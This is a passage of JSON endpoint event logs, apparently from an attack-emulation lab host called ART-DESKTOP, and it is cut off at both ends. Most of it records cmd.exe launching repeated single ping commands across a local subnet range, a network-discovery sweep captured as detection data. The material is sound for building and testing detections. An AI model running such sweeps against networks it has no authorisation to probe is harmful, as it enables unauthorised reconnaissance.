"pid": 7876, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "subtype": "terminate", - "timestamp": 131883572986840000, - "unique_pid": "{42FC7E13-CBB2-5C05-0000-001078895301}" - }, - { - "command_line": "ping -n 1 -w 100 192.168.1.204", - "event_type": "process", - "logon_id": 217055, - "parent_process_name": "cmd.exe", - "parent_process_path": "C:\\Windows\\System32\\cmd.exe", - "pid": 6064, - "ppid": 7328, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "subtype": "create", - "timestamp": 131883572986980000, - "unique_pid": "{42FC7E13-CBB2-5C05-0000-0010E88B5301}", - "unique_ppid": "{42FC7E13-CB50-5C05-0000-0010896B5101}", - "user": "ART-DESKTOP\\bob", - "user_domain": "ART-DESKTOP", - "user_name": "bob" - }, - { - "event_type": "image_load", - "image_name": "PING.EXE", - "image_path": "C:\\Windows\\System32\\PING.EXE", - "pid": 6064, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572986980000, - "unique_pid": "{42FC7E13-CBB2-5C05-0000-0010E88B5301}" - }, - { - "event_type": "image_load", - "image_name": "ntdll.dll", - "image_path": "C:\\Windows\\System32\\ntdll.dll", - "pid": 6064, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572986980000, - "unique_pid": "{42FC7E13-CBB2-5C05-0000-0010E88B5301}" - }, - { - "event_type": "image_load", - "image_name": "kernel32.dll", - "image_path": "C:\\Windows\\System32\\kernel32.dll", - "pid": 6064, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572986980000, - "unique_pid": "{42FC7E13-CBB2-5C05-0000-0010E88B5301}" - }, - { - "event_type": "image_load", - "image_name": "KernelBase.dll", - "image_path": "C:\\Windows\\System32\\KernelBase.dll", - "pid": 6064, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572986980000, - 
"unique_pid": "{42FC7E13-CBB2-5C05-0000-0010E88B5301}" - }, - { - "event_type": "image_load", - "image_name": "msvcrt.dll", - "image_path": "C:\\Windows\\System32\\msvcrt.dll", - "pid": 6064, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572986980000, - "unique_pid": "{42FC7E13-CBB2-5C05-0000-0010E88B5301}" - }, - { - "event_type": "image_load", - "image_name": "ws2_32.dll", - "image_path": "C:\\Windows\\System32\\ws2_32.dll", - "pid": 6064, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572986980000, - "unique_pid": "{42FC7E13-CBB2-5C05-0000-0010E88B5301}" - }, - { - "event_type": "image_load", - "image_name": "rpcrt4.dll", - "image_path": "C:\\Windows\\System32\\rpcrt4.dll", - "pid": 6064, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572986980000, - "unique_pid": "{42FC7E13-CBB2-5C05-0000-0010E88B5301}" - }, - { - "event_type": "image_load", - "image_name": "IPHLPAPI.DLL", - "image_path": "C:\\Windows\\System32\\IPHLPAPI.DLL", - "pid": 6064, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572986980000, - "unique_pid": "{42FC7E13-CBB2-5C05-0000-0010E88B5301}" - }, - { - "event_type": "image_load", - "image_name": "winnsi.dll", - "image_path": "C:\\Windows\\System32\\winnsi.dll", - "pid": 6064, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572986980000, - "unique_pid": "{42FC7E13-CBB2-5C05-0000-0010E88B5301}" - }, - { - "event_type": "image_load", - "image_name": "nsi.dll", - "image_path": "C:\\Windows\\System32\\nsi.dll", - "pid": 6064, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572986980000, - "unique_pid": "{42FC7E13-CBB2-5C05-0000-0010E88B5301}" - }, - { - "event_type": "image_load", - "image_name": "mswsock.dll", - 
"image_path": "C:\\Windows\\System32\\mswsock.dll", - "pid": 6064, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572986980000, - "unique_pid": "{42FC7E13-CBB2-5C05-0000-0010E88B5301}" - }, - { - "event_type": "process", - "pid": 6064, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "subtype": "terminate", - "timestamp": 131883572991990000, - "unique_pid": "{42FC7E13-CBB2-5C05-0000-0010E88B5301}" - }, - { - "command_line": "ping -n 1 -w 100 192.168.1.205", - "event_type": "process", - "logon_id": 217055, - "parent_process_name": "cmd.exe", - "parent_process_path": "C:\\Windows\\System32\\cmd.exe", - "pid": 7704, - "ppid": 7328, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "subtype": "create", - "timestamp": 131883572992140000, - "unique_pid": "{42FC7E13-CBB3-5C05-0000-0010658E5301}", - "unique_ppid": "{42FC7E13-CB50-5C05-0000-0010896B5101}", - "user": "ART-DESKTOP\\bob", - "user_domain": "ART-DESKTOP", - "user_name": "bob" - }, - { - "event_type": "image_load", - "image_name": "PING.EXE", - "image_path": "C:\\Windows\\System32\\PING.EXE", - "pid": 7704, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572992140000, - "unique_pid": "{42FC7E13-CBB3-5C05-0000-0010658E5301}" - }, - { - "event_type": "image_load", - "image_name": "ntdll.dll", - "image_path": "C:\\Windows\\System32\\ntdll.dll", - "pid": 7704, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572992140000, - "unique_pid": "{42FC7E13-CBB3-5C05-0000-0010658E5301}" - }, - { - "event_type": "image_load", - "image_name": "kernel32.dll", - "image_path": "C:\\Windows\\System32\\kernel32.dll", - "pid": 7704, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572992140000, - "unique_pid": 
"{42FC7E13-CBB3-5C05-0000-0010658E5301}" - }, - { - "event_type": "image_load", - "image_name": "KernelBase.dll", - "image_path": "C:\\Windows\\System32\\KernelBase.dll", - "pid": 7704, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572992140000, - "unique_pid": "{42FC7E13-CBB3-5C05-0000-0010658E5301}" - }, - { - "event_type": "image_load", - "image_name": "msvcrt.dll", - "image_path": "C:\\Windows\\System32\\msvcrt.dll", - "pid": 7704, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572992140000, - "unique_pid": "{42FC7E13-CBB3-5C05-0000-0010658E5301}" - }, - { - "event_type": "image_load", - "image_name": "ws2_32.dll", - "image_path": "C:\\Windows\\System32\\ws2_32.dll", - "pid": 7704, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572992140000, - "unique_pid": "{42FC7E13-CBB3-5C05-0000-0010658E5301}" - }, - { - "event_type": "image_load", - "image_name": "rpcrt4.dll", - "image_path": "C:\\Windows\\System32\\rpcrt4.dll", - "pid": 7704, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572992140000, - "unique_pid": "{42FC7E13-CBB3-5C05-0000-0010658E5301}" - }, - { - "event_type": "image_load", - "image_name": "IPHLPAPI.DLL", - "image_path": "C:\\Windows\\System32\\IPHLPAPI.DLL", - "pid": 7704, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572992140000, - "unique_pid": "{42FC7E13-CBB3-5C05-0000-0010658E5301}" - }, - { - "event_type": "image_load", - "image_name": "winnsi.dll", - "image_path": "C:\\Windows\\System32\\winnsi.dll", - "pid": 7704, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572992140000, - "unique_pid": "{42FC7E13-CBB3-5C05-0000-0010658E5301}" - }, - { - "event_type": "image_load", - "image_name": "nsi.dll", - 
"image_path": "C:\\Windows\\System32\\nsi.dll", - "pid": 7704, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572992140000, - "unique_pid": "{42FC7E13-CBB3-5C05-0000-0010658E5301}" - }, - { - "event_type": "image_load", - "image_name": "mswsock.dll", - "image_path": "C:\\Windows\\System32\\mswsock.dll", - "pid": 7704, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572992140000, - "unique_pid": "{42FC7E13-CBB3-5C05-0000-0010658E5301}" - }, - { - "event_type": "process", - "pid": 7704, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "subtype": "terminate", - "timestamp": 131883572996990000, - "unique_pid": "{42FC7E13-CBB3-5C05-0000-0010658E5301}" - }, - { - "command_line": "ping -n 1 -w 100 192.168.1.206", - "event_type": "process", - "logon_id": 217055, - "parent_process_name": "cmd.exe", - "parent_process_path": "C:\\Windows\\System32\\cmd.exe", - "pid": 1732, - "ppid": 7328, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "subtype": "create", - "timestamp": 131883572997130000, - "unique_pid": "{42FC7E13-CBB3-5C05-0000-0010DA905301}", - "unique_ppid": "{42FC7E13-CB50-5C05-0000-0010896B5101}", - "user": "ART-DESKTOP\\bob", - "user_domain": "ART-DESKTOP", - "user_name": "bob" - }, - { - "event_type": "image_load", - "image_name": "PING.EXE", - "image_path": "C:\\Windows\\System32\\PING.EXE", - "pid": 1732, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572996990000, - "unique_pid": "{42FC7E13-CBB3-5C05-0000-0010DA905301}" - }, - { - "event_type": "image_load", - "image_name": "ntdll.dll", - "image_path": "C:\\Windows\\System32\\ntdll.dll", - "pid": 1732, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572997140000, - "unique_pid": "{42FC7E13-CBB3-5C05-0000-0010DA905301}" 
- }, - { - "event_type": "image_load", - "image_name": "kernel32.dll", - "image_path": "C:\\Windows\\System32\\kernel32.dll", - "pid": 1732, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572997140000, - "unique_pid": "{42FC7E13-CBB3-5C05-0000-0010DA905301}" - }, - { - "event_type": "image_load", - "image_name": "KernelBase.dll", - "image_path": "C:\\Windows\\System32\\KernelBase.dll", - "pid": 1732, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572997140000, - "unique_pid": "{42FC7E13-CBB3-5C05-0000-0010DA905301}" - }, - { - "event_type": "image_load", - "image_name": "msvcrt.dll", - "image_path": "C:\\Windows\\System32\\msvcrt.dll", - "pid": 1732, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572997140000, - "unique_pid": "{42FC7E13-CBB3-5C05-0000-0010DA905301}" - }, - { - "event_type": "image_load", - "image_name": "ws2_32.dll", - "image_path": "C:\\Windows\\System32\\ws2_32.dll", - "pid": 1732, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572997140000, - "unique_pid": "{42FC7E13-CBB3-5C05-0000-0010DA905301}" - }, - { - "event_type": "image_load", - "image_name": "rpcrt4.dll", - "image_path": "C:\\Windows\\System32\\rpcrt4.dll", - "pid": 1732, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572997140000, - "unique_pid": "{42FC7E13-CBB3-5C05-0000-0010DA905301}" - }, - { - "event_type": "image_load", - "image_name": "IPHLPAPI.DLL", - "image_path": "C:\\Windows\\System32\\IPHLPAPI.DLL", - "pid": 1732, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572997140000, - "unique_pid": "{42FC7E13-CBB3-5C05-0000-0010DA905301}" - }, - { - "event_type": "image_load", - "image_name": "winnsi.dll", - "image_path": 
"C:\\Windows\\System32\\winnsi.dll", - "pid": 1732, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572997140000, - "unique_pid": "{42FC7E13-CBB3-5C05-0000-0010DA905301}" - }, - { - "event_type": "image_load", - "image_name": "nsi.dll", - "image_path": "C:\\Windows\\System32\\nsi.dll", - "pid": 1732, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572997140000, - "unique_pid": "{42FC7E13-CBB3-5C05-0000-0010DA905301}" - }, - { - "event_type": "image_load", - "image_name": "mswsock.dll", - "image_path": "C:\\Windows\\System32\\mswsock.dll", - "pid": 1732, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572997140000, - "unique_pid": "{42FC7E13-CBB3-5C05-0000-0010DA905301}" - }, - { - "event_type": "registry", - "pid": 2712, - "process_name": "svchost.exe", - "process_path": "c:\\windows\\system32\\svchost.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\VFUProvider", - "registry_value": "VFUProvider", - "timestamp": 131883573000270000, - "unique_pid": "{42FC7E13-B2AE-5C05-0000-0010A4060200}" - }, - { - "event_type": "registry", - "pid": 2712, - "process_name": "svchost.exe", - "process_path": "c:\\windows\\system32\\svchost.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\VFUProvider", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\VFUProvider\\StartTime", - "registry_value": "StartTime", - "timestamp": 131883573000270000, - "unique_pid": "{42FC7E13-B2AE-5C05-0000-0010A4060200}" - }, - { - "event_type": "process", - "pid": 1732, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "subtype": "terminate", - "timestamp": 131883573001830000, - "unique_pid": "{42FC7E13-CBB3-5C05-0000-0010DA905301}" - }, - { - "command_line": 
"ping -n 1 -w 100 192.168.1.207", - "event_type": "process", - "logon_id": 217055, - "parent_process_name": "cmd.exe", - "parent_process_path": "C:\\Windows\\System32\\cmd.exe", - "pid": 3440, - "ppid": 7328, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "subtype": "create", - "timestamp": 131883573001980000, - "unique_pid": "{42FC7E13-CBB4-5C05-0000-0010AE935301}", - "unique_ppid": "{42FC7E13-CB50-5C05-0000-0010896B5101}", - "user": "ART-DESKTOP\\bob", - "user_domain": "ART-DESKTOP", - "user_name": "bob" - }, - { - "event_type": "image_load", - "image_name": "PING.EXE", - "image_path": "C:\\Windows\\System32\\PING.EXE", - "pid": 3440, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883573001980000, - "unique_pid": "{42FC7E13-CBB4-5C05-0000-0010AE935301}" - }, - { - "event_type": "image_load", - "image_name": "ntdll.dll", - "image_path": "C:\\Windows\\System32\\ntdll.dll", - "pid": 3440, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883573001980000, - "unique_pid": "{42FC7E13-CBB4-5C05-0000-0010AE935301}" - }, - { - "event_type": "image_load", - "image_name": "kernel32.dll", - "image_path": "C:\\Windows\\System32\\kernel32.dll", - "pid": 3440, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883573001980000, - "unique_pid": "{42FC7E13-CBB4-5C05-0000-0010AE935301}" - }, - { - "event_type": "image_load", - "image_name": "KernelBase.dll", - "image_path": "C:\\Windows\\System32\\KernelBase.dll", - "pid": 3440, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883573001980000, - "unique_pid": "{42FC7E13-CBB4-5C05-0000-0010AE935301}" - }, - { - "event_type": "image_load", - "image_name": "msvcrt.dll", - "image_path": "C:\\Windows\\System32\\msvcrt.dll", - "pid": 3440, - "process_name": "PING.EXE", - "process_path": 
"C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883573001980000, - "unique_pid": "{42FC7E13-CBB4-5C05-0000-0010AE935301}" - }, - { - "event_type": "image_load", - "image_name": "ws2_32.dll", - "image_path": "C:\\Windows\\System32\\ws2_32.dll", - "pid": 3440, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883573001980000, - "unique_pid": "{42FC7E13-CBB4-5C05-0000-0010AE935301}" - }, - { - "event_type": "image_load", - "image_name": "rpcrt4.dll", - "image_path": "C:\\Windows\\System32\\rpcrt4.dll", - "pid": 3440, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883573001980000, - "unique_pid": "{42FC7E13-CBB4-5C05-0000-0010AE935301}" - }, - { - "event_type": "image_load", - "image_name": "IPHLPAPI.DLL", - "image_path": "C:\\Windows\\System32\\IPHLPAPI.DLL", - "pid": 3440, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883573001980000, - "unique_pid": "{42FC7E13-CBB4-5C05-0000-0010AE935301}" - }, - { - "event_type": "image_load", - "image_name": "winnsi.dll", - "image_path": "C:\\Windows\\System32\\winnsi.dll", - "pid": 3440, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883573001980000, - "unique_pid": "{42FC7E13-CBB4-5C05-0000-0010AE935301}" - }, - { - "event_type": "image_load", - "image_name": "nsi.dll", - "image_path": "C:\\Windows\\System32\\nsi.dll", - "pid": 3440, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883573001980000, - "unique_pid": "{42FC7E13-CBB4-5C05-0000-0010AE935301}" - }, - { - "event_type": "image_load", - "image_name": "mswsock.dll", - "image_path": "C:\\Windows\\System32\\mswsock.dll", - "pid": 3440, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883573001980000, - "unique_pid": "{42FC7E13-CBB4-5C05-0000-0010AE935301}" 
- }, - { - "event_type": "process", - "pid": 3440, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "subtype": "terminate", - "timestamp": 131883573006990000, - "unique_pid": "{42FC7E13-CBB4-5C05-0000-0010AE935301}" - }, - { - "command_line": "ping -n 1 -w 100 192.168.1.208", - "event_type": "process", - "logon_id": 217055, - "parent_process_name": "cmd.exe", - "parent_process_path": "C:\\Windows\\System32\\cmd.exe", - "pid": 7504, - "ppid": 7328, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "subtype": "create", - "timestamp": 131883573007140000, - "unique_pid": "{42FC7E13-CBB4-5C05-0000-001022965301}", - "unique_ppid": "{42FC7E13-CB50-5C05-0000-0010896B5101}", - "user": "ART-DESKTOP\\bob", - "user_domain": "ART-DESKTOP", - "user_name": "bob" - }, - { - "event_type": "image_load", - "image_name": "PING.EXE", - "image_path": "C:\\Windows\\System32\\PING.EXE", - "pid": 7504, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883573007140000, - "unique_pid": "{42FC7E13-CBB4-5C05-0000-001022965301}" - }, - { - "event_type": "image_load", - "image_name": "ntdll.dll", - "image_path": "C:\\Windows\\System32\\ntdll.dll", - "pid": 7504, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883573007140000, - "unique_pid": "{42FC7E13-CBB4-5C05-0000-001022965301}" - }, - { - "event_type": "image_load", - "image_name": "kernel32.dll", - "image_path": "C:\\Windows\\System32\\kernel32.dll", - "pid": 7504, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883573007140000, - "unique_pid": "{42FC7E13-CBB4-5C05-0000-001022965301}" - }, - { - "event_type": "image_load", - "image_name": "KernelBase.dll", - "image_path": "C:\\Windows\\System32\\KernelBase.dll", - "pid": 7504, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - 
"timestamp": 131883573007140000, - "unique_pid": "{42FC7E13-CBB4-5C05-0000-001022965301}" - }, - { - "event_type": "image_load", - "image_name": "msvcrt.dll", - "image_path": "C:\\Windows\\System32\\msvcrt.dll", - "pid": 7504, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883573007140000, - "unique_pid": "{42FC7E13-CBB4-5C05-0000-001022965301}" - }, - { - "event_type": "image_load", - "image_name": "ws2_32.dll", - "image_path": "C:\\Windows\\System32\\ws2_32.dll", - "pid": 7504, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883573007140000, - "unique_pid": "{42FC7E13-CBB4-5C05-0000-001022965301}" - }, - { - "event_type": "image_load", - "image_name": "rpcrt4.dll", - "image_path": "C:\\Windows\\System32\\rpcrt4.dll", - "pid": 7504, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883573007140000, - "unique_pid": "{42FC7E13-CBB4-5C05-0000-001022965301}" - }, - { - "event_type": "image_load", - "image_name": "IPHLPAPI.DLL", - "image_path": "C:\\Windows\\System32\\IPHLPAPI.DLL", - "pid": 7504, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883573007140000, - "unique_pid": "{42FC7E13-CBB4-5C05-0000-001022965301}" - }, - { - "event_type": "image_load", - "image_name": "winnsi.dll", - "image_path": "C:\\Windows\\System32\\winnsi.dll", - "pid": 7504, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883573007140000, - "unique_pid": "{42FC7E13-CBB4-5C05-0000-001022965301}" - }, - { - "event_type": "image_load", - "image_name": "nsi.dll", - "image_path": "C:\\Windows\\System32\\nsi.dll", - "pid": 7504, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883573007140000, - "unique_pid": "{42FC7E13-CBB4-5C05-0000-001022965301}" - }, - { - "event_type": "image_load", 
- "image_name": "mswsock.dll", - "image_path": "C:\\Windows\\System32\\mswsock.dll", - "pid": 7504, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883573007140000, - "unique_pid": "{42FC7E13-CBB4-5C05-0000-001022965301}" - }, - { - "event_type": "process", - "pid": 7504, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "subtype": "terminate", - "timestamp": 131883573011990000, - "unique_pid": "{42FC7E13-CBB4-5C05-0000-001022965301}" - }, - { - "command_line": "ping -n 1 -w 100 192.168.1.209", - "event_type": "process", - "logon_id": 217055, - "parent_process_name": "cmd.exe", - "parent_process_path": "C:\\Windows\\System32\\cmd.exe", - "pid": 6400, - "ppid": 7328, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "subtype": "create", - "timestamp": 131883573012150000, - "unique_pid": "{42FC7E13-CBB5-5C05-0000-0010A1985301}", - "unique_ppid": "{42FC7E13-CB50-5C05-0000-0010896B5101}", - "user": "ART-DESKTOP\\bob", - "user_domain": "ART-DESKTOP", - "user_name": "bob" - }, - { - "event_type": "image_load", - "image_name": "PING.EXE", - "image_path": "C:\\Windows\\System32\\PING.EXE", - "pid": 6400, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883573012140000, - "unique_pid": "{42FC7E13-CBB5-5C05-0000-0010A1985301}" - }, - { - "event_type": "image_load", - "image_name": "ntdll.dll", - "image_path": "C:\\Windows\\System32\\ntdll.dll", - "pid": 6400, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883573012140000, - "unique_pid": "{42FC7E13-CBB5-5C05-0000-0010A1985301}" - }, - { - "event_type": "image_load", - "image_name": "kernel32.dll", - "image_path": "C:\\Windows\\System32\\kernel32.dll", - "pid": 6400, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883573012140000, - "unique_pid": 
"{42FC7E13-CBB5-5C05-0000-0010A1985301}" - }, - { - "event_type": "image_load", - "image_name": "KernelBase.dll", - "image_path": "C:\\Windows\\System32\\KernelBase.dll", - "pid": 6400, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883573012140000, - "unique_pid": "{42FC7E13-CBB5-5C05-0000-0010A1985301}" - }, - { - "event_type": "image_load", - "image_name": "msvcrt.dll", - "image_path": "C:\\Windows\\System32\\msvcrt.dll", - "pid": 6400, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883573012140000, - "unique_pid": "{42FC7E13-CBB5-5C05-0000-0010A1985301}" - }, - { - "event_type": "image_load", - "image_name": "ws2_32.dll", - "image_path": "C:\\Windows\\System32\\ws2_32.dll", - "pid": 6400, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883573012140000, - "unique_pid": "{42FC7E13-CBB5-5C05-0000-0010A1985301}" - }, - { - "event_type": "image_load", - "image_name": "rpcrt4.dll", - "image_path": "C:\\Windows\\System32\\rpcrt4.dll", - "pid": 6400, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883573012140000, - "unique_pid": "{42FC7E13-CBB5-5C05-0000-0010A1985301}" - }, - { - "event_type": "image_load", - "image_name": "IPHLPAPI.DLL", - "image_path": "C:\\Windows\\System32\\IPHLPAPI.DLL", - "pid": 6400, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883573012140000, - "unique_pid": "{42FC7E13-CBB5-5C05-0000-0010A1985301}" - }, - { - "event_type": "image_load", - "image_name": "winnsi.dll", - "image_path": "C:\\Windows\\System32\\winnsi.dll", - "pid": 6400, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883573012140000, - "unique_pid": "{42FC7E13-CBB5-5C05-0000-0010A1985301}" - }, - { - "event_type": "image_load", - "image_name": "nsi.dll", - 
"image_path": "C:\\Windows\\System32\\nsi.dll", - "pid": 6400, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883573012140000, - "unique_pid": "{42FC7E13-CBB5-5C05-0000-0010A1985301}" - }, - { - "event_type": "image_load", - "image_name": "mswsock.dll", - "image_path": "C:\\Windows\\System32\\mswsock.dll", - "pid": 6400, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883573012140000, - "unique_pid": "{42FC7E13-CBB5-5C05-0000-0010A1985301}" - }, - { - "event_type": "process", - "pid": 6400, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "subtype": "terminate", - "timestamp": 131883573016830000, - "unique_pid": "{42FC7E13-CBB5-5C05-0000-0010A1985301}" - }, - { - "command_line": "ping -n 1 -w 100 192.168.1.210", - "event_type": "process", - "logon_id": 217055, - "parent_process_name": "cmd.exe", - "parent_process_path": "C:\\Windows\\System32\\cmd.exe", - "pid": 5616, - "ppid": 7328, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "subtype": "create", - "timestamp": 131883573016980000, - "unique_pid": "{42FC7E13-CBB5-5C05-0000-0010119B5301}", - "unique_ppid": "{42FC7E13-CB50-5C05-0000-0010896B5101}", - "user": "ART-DESKTOP\\bob", - "user_domain": "ART-DESKTOP", - "user_name": "bob" - }, - { - "event_type": "image_load", - "image_name": "PING.EXE", - "image_path": "C:\\Windows\\System32\\PING.EXE", - "pid": 5616, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883573016980000, - "unique_pid": "{42FC7E13-CBB5-5C05-0000-0010119B5301}" - }, - { - "event_type": "image_load", - "image_name": "ntdll.dll", - "image_path": "C:\\Windows\\System32\\ntdll.dll", - "pid": 5616, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883573016980000, - "unique_pid": "{42FC7E13-CBB5-5C05-0000-0010119B5301}" 
- }, - { - "event_type": "image_load", - "image_name": "kernel32.dll", - "image_path": "C:\\Windows\\System32\\kernel32.dll", - "pid": 5616, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883573016980000, - "unique_pid": "{42FC7E13-CBB5-5C05-0000-0010119B5301}" - }, - { - "event_type": "image_load", - "image_name": "KernelBase.dll", - "image_path": "C:\\Windows\\System32\\KernelBase.dll", - "pid": 5616, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883573016980000, - "unique_pid": "{42FC7E13-CBB5-5C05-0000-0010119B5301}" - }, - { - "event_type": "image_load", - "image_name": "msvcrt.dll", - "image_path": "C:\\Windows\\System32\\msvcrt.dll", - "pid": 5616, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883573016980000, - "unique_pid": 